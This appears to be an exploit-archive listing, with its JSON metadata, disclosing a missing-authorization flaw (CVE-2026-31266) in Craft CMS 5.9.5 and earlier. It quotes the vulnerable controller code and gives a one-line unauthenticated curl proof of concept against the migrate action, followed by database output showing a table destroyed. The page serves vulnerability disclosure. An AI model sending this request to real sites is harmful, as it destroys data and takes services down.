📄 Craft CMS 5.9.5 Missing Authorization / Denial of Service

7.3 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Description

Craft CMS versions 5.9.5 and below suffer from a missing authorization vulnerability that can trigger an unwanted migration...

Visit Original Source

Basic Information

ID PACKETSTORM:222760

Published Jun 5, 2026 at 00:00

Affected Product

Affected Versions # CVE-2026-31266 - Craft CMS Missing Authorization

## CVE Information
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-31266 |
| **Vendor** | Pixel & Tonic |
| **Product** | Craft CMS |
| **Affected Versions** | <= 5.9.5 |
| **CWE** | CWE-862 (Missing Authorization) |
| **CVSS** | 7.3 (High) |
| **Security Researcher** | 0xRIXET |

## Evidence Contents
- `screenshots/` - Proof of Concept demonstrations

## Vulnerability
- **Type:** Missing Authorization
- **Impact:** Authentication Bypass
- **Vendor:** Craft CMS
- **Status:** CVE-2026-31266

## Vulnerable Code

**File:** `src/controllers/AppController.php`

**Lines 65-68:**
```php
protected array|bool|int $allowAnonymous = [
'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];
```

## Proof of Concept

```bash
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"
```

## Evidence

### Before Attack:
```sql
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
| 0 |
+----------+
```

### After Attack:
```sql
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist
```

## References
- [Craft CMS Repository](https://github.com/craftcms/cms)
- [Craft Security Documentation](https://craftcms.com/knowledge-base/securing-craft)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-31266)

## Contact
- **Security Researcher:** 0xRIXET | Mohammed Al-shehri
- **Twitter | X :** @0xRIXET
- **Email:** [email protected]

{
    "lastseen": "2026-06-05T17:02:37",
    "description": "Craft CMS versions 5.9.5 and below suffer from a missing authorization vulnerability that can trigger an unwanted migration...",
    "published": "2026-06-05T00:00:00",
    "modified": "2026-06-05T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Craft CMS 5.9.5 Missing Authorization / Denial of Service",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222760",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-31266"
    ],
    "sourceData": "# CVE-2026-31266 - Craft CMS Missing Authorization\n    \n    ## CVE Information\n    | Field | Value |\n    |-------|-------|\n    | **CVE ID** | CVE-2026-31266 |\n    | **Vendor** | Pixel & Tonic |\n    | **Product** | Craft CMS |\n    | **Affected Versions** | <= 5.9.5 |\n    | **CWE** | CWE-862 (Missing Authorization) |\n    | **CVSS** | 7.3 (High) |\n    | **Security Researcher** | 0xRIXET |\n    \n    ## Evidence Contents\n    - `screenshots/` - Proof of Concept demonstrations\n    \n    \n    ## Vulnerability\n    - **Type:** Missing Authorization\n    - **Impact:** Authentication Bypass\n    - **Vendor:** Craft CMS\n    - **Status:** CVE-2026-31266\n    \n    ## Vulnerable Code\n    \n    **File:** `src/controllers/AppController.php`\n    \n    **Lines 65-68:**\n    ```php\n    protected array|bool|int $allowAnonymous = [\n        'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,\n    ];\n    ```\n    \n    ## Proof of Concept\n    \n    ```bash\n    # With allowAdminChanges=false\n    curl -X POST \"http://target/actions/app/migrate\"\n    ```\n    \n    ## Evidence\n    \n    ### Before Attack:\n    ```sql\n    mysql> SELECT COUNT(*) FROM sessions;\n    +----------+\n    | COUNT(*) |\n    +----------+\n    |        0 |\n    +----------+\n    ```\n    \n    ### After Attack:\n    ```sql\n    mysql> SELECT COUNT(*) FROM sessions;\n    ERROR 1146 (42S02): Table 'sessions' doesn't exist\n    ```\n    \n    ## References\n    - [Craft CMS Repository](https://github.com/craftcms/cms)\n    - [Craft Security Documentation](https://craftcms.com/knowledge-base/securing-craft)\n    - [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-31266)\n    \n    ## Contact\n    - **Security Researcher:** 0xRIXET | Mohammed Al-shehri\n    - **Twitter | X :** @0xRIXET\n    - **Email:** [email protected]",
    "sourceHref": "https://packetstorm.news/download/222760",
    "cvss": {
        "score": 7.3,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222760/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Craft CMS 5.9.5 Missing Authorization / Denial of Service_PACKETSTORM:222760

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply